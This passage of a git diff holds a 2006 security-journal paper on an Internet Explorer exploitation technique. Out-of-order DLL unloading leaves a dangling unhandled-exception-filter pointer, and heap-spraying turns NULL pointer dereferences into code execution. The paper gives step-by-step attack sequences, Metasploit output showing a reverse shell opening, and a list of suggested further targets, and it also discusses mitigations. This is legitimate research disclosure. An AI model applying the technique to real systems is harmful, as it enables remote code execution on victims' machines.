Usage. + http://msdn2.microsoft.com/en-us/library/ew5tede7.aspx; + accessed Apr 25, 2006. + +[8] Microsoft Corporation. Unwind Data Definitions in C. + http://msdn2.microsoft.com/en-us/library/ssa62fwe(VS.80).aspx; + accessed Apr 25, 2006. diff --git a/uninformed/4.5.txt b/uninformed/4.5.txt new file mode 100644 index 0000000..4c52983 --- /dev/null +++ b/uninformed/4.5.txt @@ -0,0 +1,711 @@ +Exploiting the Otherwise Unexploitable on Windows +skywing, skape +May 2006 + + +1) Foreword + +Abstract: This paper describes a technique that can be applied in +certain situations to gain arbitrary code execution through software +bugs that would not otherwise be exploitable, such as NULL pointer +dereferences. To facilitate this, an attacker gains control of the +top-level unhandled exception filter for a process in an indirect +fashion. While there has been previous work [1, 3] illustrating the +usefulness in gaining control of the top-level unhandled exception +filter, Microsoft has taken steps in XPSP2 and beyond, such as function +pointer encoding[4], to prevent attackers from being able to overwrite +and control the unhandled exception filter directly. While this +security enhancement is a marked improvement, it is still possible for +an attacker to gain control of the top-level unhandled exception filter +by taking advantage of a design flaw in the way unhandled exception +filters are chained. This approach, however, is limited by an attacker's +ability to control the chaining of unhandled exception filters, such as +through the loading and unloading of DLLs. This does reduce the global +impact of this approach; however, there are some interesting cases where +it can be immediately applied, such as with Internet Explorer. + +Disclaimer: This document was written in the interest of education. The +authors cannot be held responsible for how the topics discussed in this +document are applied. + +Thanks: The authors would like to thank H D Moore, and everyone who +learns because it's fun. + +Update: This issue has now been addressed by the patch included in +MS06-051. 
A complete analysis has not yet been performed to ensure that +it patches all potential vectors. + +With that, on with the show... + + +2) Introduction + +In the security field, software bugs can be generically grouped into two +categories: exploitable or non-exploitable. If a software bug is +exploitable, then it can be leveraged to the advantage of the attacker, +such as to gain arbitrary code execution. However, if a software bug is +non-exploitable, then it is not possible for the attacker to make use of +it for anything other than perhaps crashing the application. In more +cases than not, software bugs will fall into the category of being +non-exploitable simply because they typically deal with common mistakes +or invalid assumptions that are not directly related to buffer +management or loop constraints. This can be frustrating during auditing +and product analysis from an assessment standpoint. With that in mind, +it only makes sense to try think of ways to turn otherwise +non-exploitable issues into exploitable issues. + +In order to accomplish this feat, it's first necessary to try to +consider execution vectors that could be redirected to code that the +attacker controls after triggering a non-exploitable bug, such as a NULL +pointer dereference. For starters, it is known that the triggering of a +NULL pointer dereference will cause an access violation exception to be +dispatched. When this occurs, the user-mode exception dispatcher will +call the registered exception handlers for the thread that generated the +exception, allowing each the opportunity to handle the exception. If +none of the exception handlers know what to do with it, the user-mode +exception dispatcher will call the top-level unhandled exception filter +(UEF) via kernel32!UnhandledExceptionFilter (if one has been set). The +implementation of a function that is set as the registered top-level UEF +is not specified, but in most cases it will be designed to pass +exceptions that it cannot handle onto the top-level UEF that was +registered previously, effectively creating a chain of UEFs. This +process will be explained in more detail in the next chapter. + +Aside from the exception dispatching process, there are not any other +controllable execution vectors that an attacker might be able to +redirect without some other situation-specific conditions. For that +reason, the most important place to look for a point of redirection is +within the exception dispatching process itself. This will provide a +generic means of gaining execution control for any bug that can be made +to crash an application. + +Since the first part of the exception dispatching process is the calling +of registered exception handlers for the thread, it may make sense to +see if there are any controllable execution paths taken by the +registered exception handlers at the time that the exception is +triggered. This may work in some cases, but is not universal and +requires analysis of the specific exception handler routines. Without +having an ability to corrupt the list of exception handlers, there is +likely to be no other method of redirecting this phase of the exception +dispatching process. + +If none of the registered exception handlers can be redirected, one must +look toward a method that can be used to redirect the unhandled +exception filter. This could be accomplished by changing the function +pointer to call into controlled code as illustrated in[1,3]. 
However, Microsoft has taken steps in XPSP2, such as encoding the
+function pointer that represents the top-level UEF [4]. This makes it
+no longer feasible to directly overwrite the global variable that
+contains the top-level UEF. With that in mind, it may also make sense
+to look at the function associated with the top-level UEF at the time
+that the exception is dispatched in order to see if the function itself
+has any meaningful way to redirect its execution.
+
+From this initial analysis, one is left having to perform an
+application-dependent analysis of the registered exception handlers and
+UEFs that exist at the time that the exception is dispatched. Though
+this may be useful in some situations, such cases are likely to be few
+and far between. For that reason, it makes sense to try to dive one
+layer deeper to learn more about the exception dispatching process.
+Chapter 3 will describe in more detail how unhandled exception filters
+work, setting the stage for the focus of this paper. Based on that
+understanding, chapter 4 will expound upon an approach that can be used
+to gain indirect control of the top-level UEF. Finally, chapter 5 will
+formalize the results of this analysis in an example of a working
+exploit that takes advantage of one of the many NULL pointer
+dereferences in Internet Explorer to gain arbitrary code execution.
+
+
+3) Understanding Unhandled Exception Filters
+
+This chapter provides an introductory background into the way unhandled
+exception filters are registered and how the process of filtering an
+exception that is not handled actually works. This information is
+intended to act as a base for understanding the attack vector described
+in chapter 4. If the reader already has sufficient understanding of the
+way unhandled exception filters operate, feel free to skip ahead.
+
+
+3.1) Setting the Top-Level UEF
+
+In order to make it possible for applications to handle all exceptions
+on a process-wide basis, the exception dispatcher exposes an interface
+for registering an unhandled exception filter. The purpose of the
+unhandled exception filter is entirely application specific. It can be
+used to log extra information about an unhandled exception, perform
+some advanced error recovery, handle language-specific exceptions, or
+carry out any other sort of task that may be needed when an exception
+occurs that is not handled. To specify a function that should be used
+as the top-level unhandled exception filter for the process, a call
+must be made to kernel32!SetUnhandledExceptionFilter, which is
+prototyped as [6]:
+
+
+LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(
+    LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
+    );
+
+When called, this function will take the function pointer passed in as
+the lpTopLevelExceptionFilter argument and encode it using
+kernel32!RtlEncodePointer. The result of the encoding will be stored in
+the global variable kernel32!BasepCurrentTopLevelFilter, thus
+superseding any previously established top-level filter. The previous
+value stored within this global variable is decoded using
+kernel32!RtlDecodePointer and returned to the caller. Again, the
+encoding and decoding of this function pointer is intended to prevent
+attackers from being able to use an arbitrary memory overwrite to
+redirect it as has been done pre-XPSP2.
+
+There are two reasons that kernel32!SetUnhandledExceptionFilter returns
+a pointer to the original top-level UEF.
First, it makes it possible to +restore the original top-level UEF at some point in the future. Second, +it makes it possible to create an implicit ``chain'' of UEFs. In this +design, each UEF can make a call down to the previously registered +top-level UEF by doing something like the pseudo code below: + + +... app specific handling ... + +if (!IsBadCodePtr(PreviousTopLevelUEF)) + return PreviousTopLevelUEF(ExceptionInfo); +else + return EXCEPTION_CONTINUE_SEARCH; + +When a block of code that has registered a top-level UEF wishes to +deregister itself, it does so by setting the top-level UEF to the value +that was returned from its call to kernel32!SetUnhandledExceptionFilter. +The reason it does it this way is because there is no true list of +unhandled exception filters that is maintained. This method of +deregistering has one very important property that will serve as the +crux of this document. Since deregistration happens in this fashion, +the register and deregister operations associated with a top-level UEF +must occur in symmetric order. + +In one example, the top-level UEF Fx is registered, returning Nx as the +previous top-level UEF. Following that, Gx is registered, returning Fx +as the previous value. After some period of time, Gx is deregistered by +setting Fx as the top-level UEF, thus returning the top-level UEF to the +value it contained before Gx was registered. Finally, Fx deregisters by +setting Nx as the top-level UEF. + + +3.2) Handling Unhandled Exceptions + +When an exception goes through the initial phase of the exception +dispatching process and is not handled by any of the registered +exception handlers for the thread that the exception occurred in, the +exception dispatcher must take one final stab at getting it handled +before forcing the application to terminate. One of the options the +exception dispatcher has at this point is to pass the exception to a +debugger, assuming one is attached. Otherwise, it has no choice but to +try to handle the exception internally and abort the application if that +fails. To allow this to happen, applications can make a call to the +unhandled exception filter associated with the process as described in [5]. +In the general case, calling the unhandled exception filter will result +in kernel32!UnhandledExceptionFilter being called with information about +the exception being dispatched. + +The job of kernel32!UnhandledExceptionFilter is two fold. First, if a +debugger is not present, it must make a call to the top-level UEF +registered with the process. The top-level UEF can then attempt to +handle the exception, possibly recovering and allowing execution to +continue, such as by returning EXCEPTION_CONTINUE_EXECUTION. Failing +that, it can either forcefully terminate the process, typically by +returning EXCEPTION_EXECUTE_HANDLER or allow the normal error reporting +dialog to be displayed by returning EXCEPTION_CONTINUE_SEARCH. If a +debugger is present, the unhandled exception filter will attempt to pass +the exception on to the debugger in order to give it a chance to handle +the exception. When this occurs, the top-level UEF is not called. This +is important to remember as the paper goes on, as it can be a source of +trouble if one forgets this fact. 
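+
+To make the chaining behavior described above concrete, the following
+is a minimal sketch (not taken from any implementation discussed in
+this paper) of how a module might register a chaining top-level UEF and
+later deregister it symmetrically. The filter name MyTopLevelFilter and
+its logging are purely illustrative.
+
+#include <windows.h>
+#include <stdio.h>
+
+/* Saved return value of SetUnhandledExceptionFilter: the previously
+   registered top-level UEF, or NULL if there was none. */
+static LPTOP_LEVEL_EXCEPTION_FILTER PreviousTopLevelUEF;
+
+static LONG WINAPI MyTopLevelFilter(EXCEPTION_POINTERS *ExceptionInfo)
+{
+    /* ... application specific handling ... */
+    printf("unhandled exception code 0x%08lx\n",
+           ExceptionInfo->ExceptionRecord->ExceptionCode);
+
+    /* Defer to the previously registered top-level UEF, if any. */
+    if (PreviousTopLevelUEF)
+        return PreviousTopLevelUEF(ExceptionInfo);
+
+    return EXCEPTION_CONTINUE_SEARCH;
+}
+
+int main(void)
+{
+    /* Register: remember whatever filter was installed before us. */
+    PreviousTopLevelUEF = SetUnhandledExceptionFilter(MyTopLevelFilter);
+
+    /* ... application runs; any exception that no registered handler
+       claims would reach MyTopLevelFilter here ... */
+
+    /* Deregister symmetrically: restore exactly what was returned. */
+    SetUnhandledExceptionFilter(PreviousTopLevelUEF);
+    return 0;
+}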
+
+When operating with no debugger present,
+kernel32!UnhandledExceptionFilter will attempt to decode the function
+pointer associated with the top-level UEF by calling
+kernel32!RtlDecodePointer on the global variable that contains the
+top-level UEF, kernel32!BasepCurrentTopLevelFilter, as shown below:
+
+
+7c862cc1 ff35ac33887c  push dword ptr [kernel32!BasepCurrentTopLevelFilter]
+7c862cc7 e8e1d6faff    call kernel32!RtlDecodePointer (7c8103ad)
+
+If the value returned from kernel32!RtlDecodePointer is not NULL, then a
+call is made to the now-decoded top-level UEF function, passing the
+exception information on:
+
+
+7c862ccc 3bc7          cmp  eax,edi
+7c862cce 7415          jz   kernel32!UnhandledExceptionFilter+0x15b (7c862ce5)
+7c862cd0 53            push ebx
+7c862cd1 ffd0          call eax
+
+The return value of the filter will control whether or not the
+application continues execution, terminates, or reports an error and
+terminates.
+
+
+3.3) Uses for Unhandled Exception Filters
+
+In most cases, unhandled exception filters are used for
+language-specific exception handling. This is handled transparently
+for programmers of the language. For instance, C++ code will typically
+register an unhandled exception filter through
+__CxxSetUnhandledExceptionFilter during CRT initialization as called
+from the entry point associated with the program or shared library.
+Likewise, C++ will typically deregister the unhandled exception filter
+that it registers by calling __CxxRestoreUnhandledExceptionFilter
+during program termination or shared library unloading.
+
+Other uses include programs that wish to do advanced error reporting or
+information collection prior to allowing an application to terminate
+due to an unhandled exception.
+
+
+4) Gaining Control of the Unhandled Exception Filter
+
+At this point, the only feasible vector for gaining control of the
+top-level UEF is to cause calls to be made to
+kernel32!SetUnhandledExceptionFilter. This is primarily due to the fact
+that the global variable holds the current function pointer in encoded
+form. One could consider attempting to cause code to be redirected
+directly to kernel32!SetUnhandledExceptionFilter, but doing so would
+require some kind of otherwise-exploitable vulnerability in an
+application, thus making it not useful in the context of this document.
+
+Given these restrictions, it makes sense to think a little bit more
+about the process involved in registering and deregistering UEFs. Since
+the chain of registered UEFs is implicit, it may be possible to cause
+that chain to become corrupt or invalid in some way that might be
+useful. One of the requirements that is known about the registration
+process for top-level UEFs is that the register and deregister
+operations must be symmetric. What happens if they aren't, though?
+Consider the following example where Fx and Gx are registered and
+deregistered, but in asymmetric order.
+
+In this example, Fx and Gx are registered first. Following that, Fx is
+deregistered prior to deregistering Gx, thus making the operation
+asymmetrical. As a result of Fx deregistering first, the top-level UEF
+is set to Nx, even though Gx should technically still be a part of the
+chain. Finally, Gx deregisters, setting the top-level UEF to Fx even
+though Fx had been previously deregistered. This is obviously incorrect
+behavior, but the code associated with Gx has no idea that Fx has been
+deregistered due to the implicit chain that is created.
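+
+The sequence just described can be expressed in a few lines of code.
+The sketch below is illustrative only: Fx and Gx are placeholder
+filters, and in practice each registration and restoration would happen
+inside a different DLL rather than in a single main().
+
+#include <windows.h>
+
+static LONG WINAPI Fx(EXCEPTION_POINTERS *Info)
+{ return EXCEPTION_CONTINUE_SEARCH; }
+
+static LONG WINAPI Gx(EXCEPTION_POINTERS *Info)
+{ return EXCEPTION_CONTINUE_SEARCH; }
+
+int main(void)
+{
+    LPTOP_LEVEL_EXCEPTION_FILTER Nx, PrevForG;
+
+    Nx       = SetUnhandledExceptionFilter(Fx); /* register Fx, returns Nx */
+    PrevForG = SetUnhandledExceptionFilter(Gx); /* register Gx, returns Fx */
+
+    /* Asymmetric deregistration: Fx's owner restores Nx first... */
+    SetUnhandledExceptionFilter(Nx);            /* top-level UEF is now Nx */
+
+    /* ...then Gx's owner restores what it saved, resurrecting Fx. */
+    SetUnhandledExceptionFilter(PrevForG);      /* top-level UEF is now Fx */
+
+    /* If the code containing Fx has been unloaded by this point, any
+       unhandled exception will call through a dangling pointer. */
+    return 0;
+}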
+
+If asymmetric registration of UEFs can be made to occur, it might be
+possible for an attacker to gain control of the top-level UEF. Consider
+for a moment that the register and deregister operations in the example
+above occur during DLL load and unload, respectively. If that is the
+case, then after deregistration occurs, the DLLs associated with the
+UEFs will be unloaded. This will leave the top-level UEF set to Fx,
+which now points to an invalid region of memory. If an exception occurs
+after this point and is not handled by a registered exception handler,
+the unhandled exception filter will be called. If a debugger is not
+attached, the top-level UEF Fx will be called. Since Fx points to
+memory that is no longer associated with the DLL that contained Fx, the
+process will terminate --- or worse.
+
+From a security perspective, the act of leaving a dangling function
+pointer that now points to unallocated memory can be a dream come true.
+If a scenario such as this occurs, an attacker can attempt to consume
+enough memory to allow them to store arbitrary code at the location
+where the function originally resided. In the event that the function
+is called, the attacker's arbitrary code will be executed rather than
+the code that was originally at that location. In the case of the
+top-level UEF, the only thing that an attacker would need to do in
+order to cause the function pointer to be called is to generate an
+unhandled exception, such as a NULL pointer dereference.
+
+All of these details combine to provide a feasible vector for executing
+arbitrary code. First, it's necessary to be able to cause at least two
+DLLs that set UEFs to be deregistered asymmetrically, thus leaving the
+top-level UEF pointing to invalid memory. Second, it's necessary to
+consume enough memory that attacker controlled code can reside at the
+location where one of the UEF functions originally resided. Finally, an
+exception must be generated that causes the top-level UEF to be called,
+thus executing the attacker's arbitrary code.
+
+The big question, though, is how feasible it really is to control the
+registering and deregistering of UEFs. To answer that, chapter 5
+provides a case study on one such application where it's all too
+possible: Internet Explorer.
+
+
+5) Case Study: Internet Explorer
+
+Unfortunately for Internet Explorer, it's time for it to once again don
+the all-too-exploitable hat and tell us about how it can be used as a
+medium to gain arbitrary code execution from otherwise non-exploitable
+bugs. In this approach, Internet Explorer is used as a medium for
+causing DLLs that register and deregister top-level UEFs to be loaded
+and unloaded. One way in which an attacker can accomplish this is by
+using Internet Explorer's facilities for instantiating COM objects from
+within the browser. This can be accomplished either by using the new
+ActiveXObject construct in JavaScript or by using the HTML OBJECT tag.
+
+In either case, when a COM object is being instantiated, the DLL
+associated with that COM object will be loaded into memory if the
+object instance is created using the INPROC_SERVER class context. When
+this happens, the COM object's DllMain will be called. If the DLL has
+an unhandled exception filter, it may be registered during CRT
+initialization as called from the DLL's entry point. This takes care of
+the registering of UEFs, so long as COM objects that are associated
+with DLLs that set UEFs can be found.
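+
+For readers less familiar with the COM side of this, the sketch below
+shows the same load path from a native client's perspective rather than
+from script; it is illustrative only, and the CLSID passed in is a
+placeholder for whichever class an attacker would instantiate from the
+browser. The important point is that creating any in-process server
+maps its DLL and runs its DllMain/CRT initialization, which is where a
+UEF may be registered.
+
+#include <objbase.h>
+
+/* Link against ole32.lib (and uuid.lib for IID_IUnknown). */
+void LoadInprocServer(const CLSID *clsid)
+{
+    IUnknown *unk = NULL;
+
+    CoInitialize(NULL);
+
+    /* Loading the in-process server maps its DLL into the process; if
+       the DLL's CRT registers a top-level UEF, that happens here. */
+    if (SUCCEEDED(CoCreateInstance(clsid, NULL, CLSCTX_INPROC_SERVER,
+                                   &IID_IUnknown, (void **)&unk)))
+        unk->lpVtbl->Release(unk);
+
+    CoUninitialize();
+}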
+
+To control the deregister phase, it is necessary to somehow cause the
+DLLs associated with the previously instantiated COM objects to be
+unloaded. One approach that can be taken to do this is to attempt to
+leverage the locations that ole32!CoFreeUnusedLibrariesEx is called
+from. One particular place that it's called from is during the closure
+of an Internet Explorer window that once hosted the COM object. When
+this function is called, all currently loaded COM DLLs will have their
+DllCanUnloadNow routines called. If the routine returns S_OK, such as
+when there are no outstanding references to COM objects hosted by the
+DLL, then the DLL can be unloaded.
+
+Now that techniques for controlling the loading and unloading of DLLs
+that set UEFs have been identified, it's necessary to come up with an
+implementation that will allow the deregister phase to occur
+asymmetrically. One method that can be used to accomplish this is
+illustrated by the registration phase and the deregistration phase
+described below.
+
+Registration:
+
+1. Open window #1
+2. Instantiate COMObject1
+3. Load DLL 1
+4. SetUnhandledExceptionFilter(Fx) => Nx
+
+5. Open window #2
+6. Instantiate COMObject2
+7. Load DLL 2
+8. SetUnhandledExceptionFilter(Gx) => Fx
+
+In the example described above, two windows are opened, each of which
+registers a UEF by way of a DLL that implements a specific COM object.
+In this example, the first window instantiates COMObject1, which is
+implemented by DLL 1. When DLL 1 is loaded, it registers a top-level
+UEF Fx. Once that completes, the second window is opened, which
+instantiates COMObject2, thus causing DLL 2 to be loaded, which also
+registers a top-level UEF, Gx. Once these operations complete, DLL 1
+and DLL 2 are still resident in memory and the top-level UEF points to
+Gx.
+
+To gain control of the top-level UEF, Fx and Gx will need to be
+deregistered asymmetrically. To accomplish this, DLL 1 must be unloaded
+before DLL 2. This can be done by closing the window that hosts
+COMObject1, thus causing ole32!CoFreeUnusedLibrariesEx to be called,
+which results in DLL 1 being unloaded. Following that, the window that
+hosts COMObject2 should be closed, once again causing unused libraries
+to be freed and DLL 2 unloaded. The listing below illustrates this
+process.
+
+Deregistration:
+
+1. Close window #1
+2. CoFreeUnusedLibrariesEx
+3. Unload DLL 1
+4. SetUnhandledExceptionFilter(Nx) => Gx
+
+5. Close window #2
+6. CoFreeUnusedLibrariesEx
+7. Unload DLL 2
+8. SetUnhandledExceptionFilter(Fx) => Nx
+
+After the deregistration process above completes, Fx will be the
+top-level UEF for the process, even though the DLL that hosts it, DLL
+1, has been unloaded. If an exception occurs at this point in time, the
+unhandled exception filter will make a call to a function that now
+points to an invalid region of memory.
+
+At this point, an attacker now has reasonable control over the
+top-level UEF but is still in need of some approach that can be used to
+place his or her code at the location where Fx resided. To accomplish
+this, attackers can make use of the heap-spraying [7, 8] technique that
+has been commonly applied to browser-based vulnerabilities. The purpose
+of the heap-spraying technique is to consume an arbitrary amount of
+memory such that the contents of the heap grow toward a specific
+address region. The contents, or spray data, are arbitrary code that
+will result in an attacker's direct or indirect control of execution
+flow once the vulnerability is triggered.
For the purpose of this paper, the trigger +is the generation of an arbitrary exception. + +As stated above, the heap-spraying technique can be used to place code +at the location that Fx resided. However, this is limited by whether or +not that location is close enough to the heap to be a practical target +for heap-spraying. In particular, if the heap is growing from +0x00480000 and the DLL that contains Fx was loaded at 0x7c800000, it +would be a requirement that roughly 1.988 GB of data be placed in the +heap. That is, of course, assuming that the target machine has enough +memory to contain this allocation (across RAM and swap). Not to mention +the fact that spraying that much data could take an inordinate amount of +time depending on the speed of the machine. For these reasons, it is +typically necessary for the DLL that contains Fx in this example +scenario to be mapped at an address that is as close as possible to a +region that the heap is growing from. + +During the research of this attack vector, it was found that all of the +COM DLLs provided by Microsoft on XPSP2 are compiled to load at higher +addresses which make them challenging to reach with heap-spraying, but +it's not impossible. Many 3rd party COM DLLs, however, are compiled +with a default load address of 0x00400000, thus making them perfect +candidates for this technique. Another thing to keep in mind is that +the preferred load address of a DLL is just that: preferred. If two +DLLs have the same preferred load address, or their mappings would +overlap, then obviously one would be relocated to a new location, +typically at a lower address close to the heap, when it is loaded. By +keeping this fact in mind, it may be possible to load DLLs that overlap, +forcing relocation of a DLL that sets a UEF that would otherwise be +loaded at a higher address. + +It is also very important to note that a COM object does not have to be +successfully instantiated for the DLL associated with it to be loaded +into memory. This is because in order for Internet Explorer to +determine whether or not the COM class can be created and is compatible +with one that may be used from Internet Explorer, it must load and query +various COM interfaces associated with the COM class. This fact is very +useful because it means that any DLL that hosts a COM object can be used +--- not just ones that host COM objects that can be successfully +instantiated from Internet Explorer. + +The culmination of all of these facts is a functional proof of concept +exploit for Windows XP SP2 and the latest version of Internet Explorer +with all patches applied prior to MS06-051. Its one requirement is that +the target have Adobe Acrobat installed. Alternatively, other 3rd party +(or even MS provided DLLs) can be used so long as they can be feasibly +reached with heap-spraying techniques. Technically speaking, this proof +of concept exploits a NULL pointer dereference to gain arbitrary code +execution. It has been implemented as an exploit module for the 3.0 +version of the Metasploit Framework. + +The following example shows this proof of concept in action: + + +msf exploit(windows/browser/ie_unexpfilt_poc) > exploit +[*] Started reverse handler +[*] Using URL: http://x.x.x.x:8080/FnhWjeVOnU8NlbAGAEhjcjzQWh17myEK1Exg0 +[*] Server started. +[*] Exploit running as background job. 
+msf exploit(windows/browser/ie_unexpfilt_poc) > +[*] Sending stage (474 bytes) +[*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:1059) + +msf exploit(windows/browser/ie_unexpfilt_poc) > session -i 1 +[*] Starting interaction with 1... + +Microsoft Windows XP [Version 5.1.2600] +(C) Copyright 1985-2001 Microsoft Corp. + +C:\Documents and Settings\mmiller\Desktop> + + +6) Mitigation Techniques + +In the interest of not presenting a problem without a solution, the authors +have devised a few different approaches that might be taken by Microsoft to +solve this issue. Prior to identifying the solution, it is important to +summarize the root of the problem. In this case, the authors feel that the +problem at hand is rooted around a design flaw with the way the unhandled +exception filter ``chain'' is maintained. In particular, the ``chain'' +management is an implicit thing which hinges on the symmetric registering and +deregistering of unhandled exception filters. In order to solve this design +problem, some mechanism must be put in place that will eliminate the +symmetrical requirement. Alternatively, the symmetrical requirement could be +retained so long as something ensured that operations never occurred out of +order. The authors feel that this latter approach is more complicated and +potentially not feasible. The following sections will describe a few different +approaches that might be used or considered to solve this issue. + +Aside from architecting a more robust implementation, this attack vector may +also be mitigated through conventional exploitation counter-measures, such as +NX and ASLR. + + +6.1) Behavioral Change to SetUnhandledExceptionFilter + +One way in which Microsoft could solve this issue would be to change the +behavior of kernel32!SetUnhandledExceptionFilter in a manner that allows it to +support true registration and deregistration operations rather than implicit +ones. This can be accomplished by making it possible for the function to +determine whether a register operation is occurring or whether a deregister +operation is occurring. + +Under this model, when a registration operation occurs, +kernel32!SetUnhandledExceptionFilter can return a dynamically generated context +that merely calls the routine that is previous to the one that was registered. +The fact that the context is dynamically generated makes it possible for the +function to distinguish between registrations and deregistrations. When the +function is called with a dynamically generated context, it can assume that a +deregistration operation os occurring. Otherwise, it must assume that a +registration operation is occurring. + +To ensure that the underlying list of registered UEFs is not corrupted, +kernel32!SetUnhandledExceptionFilter can be modified to ensure that when a +deregistration operation occurs, any dynamically generated contexts that +reference the routine being deregistered can be updated to call to the +next-previous routine, if any, or simply return if there is no longer a +previous routine. + + +6.2) Prevent Setting of non-image UEF + +One approach that could be used to solve this issue for the general case is the +modification of kernel32!SetUnhandledExceptionFilter to ensure that the +function pointer being passed in is associated with an image region. By adding +this check at the time this function is called, the attack vector described in +this document can be mitigated. However, doing it in this manner may have +negative implications for backward compatibility. 
For instance, there are likely to be cases where this scenario happens
+completely legitimately without malicious intent. If a check like this
+were to be added, a once-working application would begin to fail due to
+the added security checks. This is not an unlikely scenario. Just
+because an unhandled exception filter is invalid doesn't mean that it
+will eventually cause the application to crash; it may, in fact, never
+be executed.
+
+
+6.3) Prevent Execution of non-image UEF
+
+As with preventing the setting of a non-image UEF, it may also be
+possible to modify kernel32!UnhandledExceptionFilter to prevent
+execution of the top-level UEF if it points to a non-image region.
+While this seems like it would be a useful check and should solve the
+issue, the fact is that it does not. Consider the scenario where a
+top-level UEF is set to an invalid address due to asymmetric
+deregistration. Following that, the top-level UEF is set to a new
+value, which is the location of a valid function. After this point, if
+an unhandled exception is dispatched, kernel32!UnhandledExceptionFilter
+will see that the top-level UEF points to a valid image region and as
+such will call it. However, the top-level UEF may be implemented in
+such a way that it will pass exceptions that it cannot handle onto the
+previously registered top-level UEF. When this occurs, the invalid UEF
+is called, which may point to arbitrary code at the time that it's
+executed. The fact that kernel32!UnhandledExceptionFilter can filter
+out non-image regions does not change the fact that uncontrolled UEFs
+may pass exceptions on up the chain.
+
+
+7) Future Research
+
+With the technique identified for being able to control the top-level
+UEF by taking advantage of asymmetric deregistration, future research
+can begin to identify better ways in which to accomplish this. For
+instance, rather than relying on child windows in Internet Explorer,
+there may be another vector through which ole32!CoFreeUnusedLibrariesEx
+can be called to cause the asymmetric deregistration to occur. By
+default, ole32!CoFreeUnusedLibrariesEx is called every ten minutes, but
+this fact is not particularly useful in terms of general exploitation.
+There may also be better and more refined techniques that can be used
+to more accurately spray the heap in order to place arbitrary code at
+the location where a defunct top-level UEF resided.
+
+Aside from improving the technique itself, it is also prudent to
+consider other software applications that could be affected by this.
+In most cases, this technique will not be feasible due to an attacker's
+inability to control the loading and unloading of DLLs. However, should
+a mechanism for accomplishing this be exposed, it may indeed be
+possible to take advantage of this.
+
+One such target software application that the authors find most
+intriguing would be IIS. If it were possible for a remote attacker to
+cause DLLs that use UEFs to be loaded and unloaded in a particular
+order, such as by accessing websites that load COM objects, then it may
+be possible for an attacker to leverage this vector on a remote
+webserver. At the time of this writing, the only approach that the
+authors are aware of that could permit this is the remote debugging
+features present in ASP.NET that allow for the instantiation of COM
+objects that are placed in a specific allow list. This isn't a very
+common configuration, and is also limited by which COM objects can be
+instantiated, thus making it not particularly feasible.
However, it is thought that other, more feasible techniques may exist
+to accomplish this.
+
+Aside from IIS, the authors are also of the opinion that this attack
+vector could be applied to many of the Microsoft Office applications,
+such as Excel and Word. These suites are thought to be vulnerable due
+to the fact that they permit the instantiation and embedding of
+arbitrary COM objects in the document files. If it were possible to
+come up with a way to control the loading and unloading of DLLs through
+these instantiations, it may be possible to take advantage of the flaw
+outlined in this paper. One particular way in which this may be
+possible is through the use of macros, but this has a lesser severity
+because it would require some form of user interaction to permit the
+execution of macros.
+
+Another interesting application that may be susceptible to this attack
+is Microsoft SQL Server. Due to the fact that SQL Server has features
+that permit the loading and unloading of DLLs, it may be possible to
+leverage a SQL injection attack in a way that makes it possible to gain
+control of the top-level UEF by causing certain DLLs to be loaded and
+unloaded. However, given the ability to load DLLs, there are likely to
+be other techniques that can be used to gain code execution as well.
+Once that occurs, a large query with predictable results could be used
+as a mechanism to spray the heap. This type of attack could even be
+accomplished through something as innocuous as a website that is merely
+backed by the SQL Server. Remember, attack vectors aren't always
+direct.
+
+
+8) Conclusion
+
+The title of this paper implies that an attacker has the ability to
+gain code execution from bugs that would otherwise not be useful, such
+as NULL pointer dereferences. To that point, this paper has illustrated
+a technique that can be used to gain control of the top-level unhandled
+exception filter for an application by making the registration and
+deregistration process asymmetrical. Once the top-level UEF has been
+made to point to invalid memory, an attacker can use techniques like
+heap-spraying to attempt to place attacker-controlled code at the
+location where the now-defunct top-level UEF resided. Assuming this can
+be accomplished, an attacker simply needs to be able to trigger an
+unhandled exception to cause the execution of arbitrary code.
+
+The crux of this attack vector is in leveraging a design flaw in the
+assumptions made by the way the unhandled exception filter ``chain'' is
+maintained. In particular, the design assumes that calls made to
+register, and subsequently deregister, an unhandled exception filter
+through kernel32!SetUnhandledExceptionFilter will be done
+symmetrically. However, this cannot always be controlled, as DLLs that
+register unhandled exception filters are not always guaranteed to be
+loaded and unloaded in a symmetric fashion. If an attacker is capable
+of controlling the order in which DLLs are loaded and unloaded, then
+they may be capable of gaining arbitrary code execution through this
+technique, such as was illustrated in the Internet Explorer case study
+in chapter 5.
+
+While not feasible in most cases, this technique has been proven to
+work in at least one critical application: Internet Explorer. Going
+forward, other applications, such as IIS, may also be found to be
+susceptible to this attack vector. All it will take is a little
+creativity and the right set of conditions.
+
+
+Bibliography
+
+[1] Conover, Matt and Oded Horovitz.
Reliable Windows Heap Exploits. +http://cansecwest.com/csw04/csw04-Oded+Connover.ppt; accessed +May 6, 2006. + + +[2] Kazienko, Przemyslaw and Piotr Dorosz. Hacking an SQL Server. +http://www.windowsecurity.com/articles/HackinganSQLServer.html; +accessed May 7, 2006. + + +[3] Litchfield, David. Windows Heap Overflows. +http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt; +accessed May 6, 2006. + + +[4] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!). +http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx; +accessed May 6, 2006. + + +[5] Microsoft Corporation. UnhandledExceptionFilter. +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/unhandledexceptionfilter.asp; +accessed May 6, 2006. + + +[6] Microsoft Corporation. SetUnhandledExceptionFilter. +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/setunhandledexceptionfilter.asp; +accessed May 6, 2006. + +[7] Murphy, Matthew. Windows Media Player Plug-In Embed Overflow; +http://www.milw0rm.com/exploits/1505; accessed May +7, 2006. + + +[8] SkyLined. InternetExploiter. +http://www.edup.tudelft.nl/ bjwever/exploits/InternetExploiter2.zip; +accessed May 7, 2006. diff --git a/uninformed/4.6.txt b/uninformed/4.6.txt new file mode 100644 index 0000000..07cf397 --- /dev/null +++ b/uninformed/4.6.txt @@ -0,0 +1,1004 @@ +Abusing Mach on Mac OS X +May, 2006 +nemo +nemo@felinemenace.org + +1) Foreword + +Abstract: This paper discusses the security implications of Mach being +integrated with the Mac OS X kernel. A few examples are used to illustrate how +Mach support can be used to bypass some of the BSD security features, such as +securelevel. Furthermore, examples are given that show how Mach functions can +be 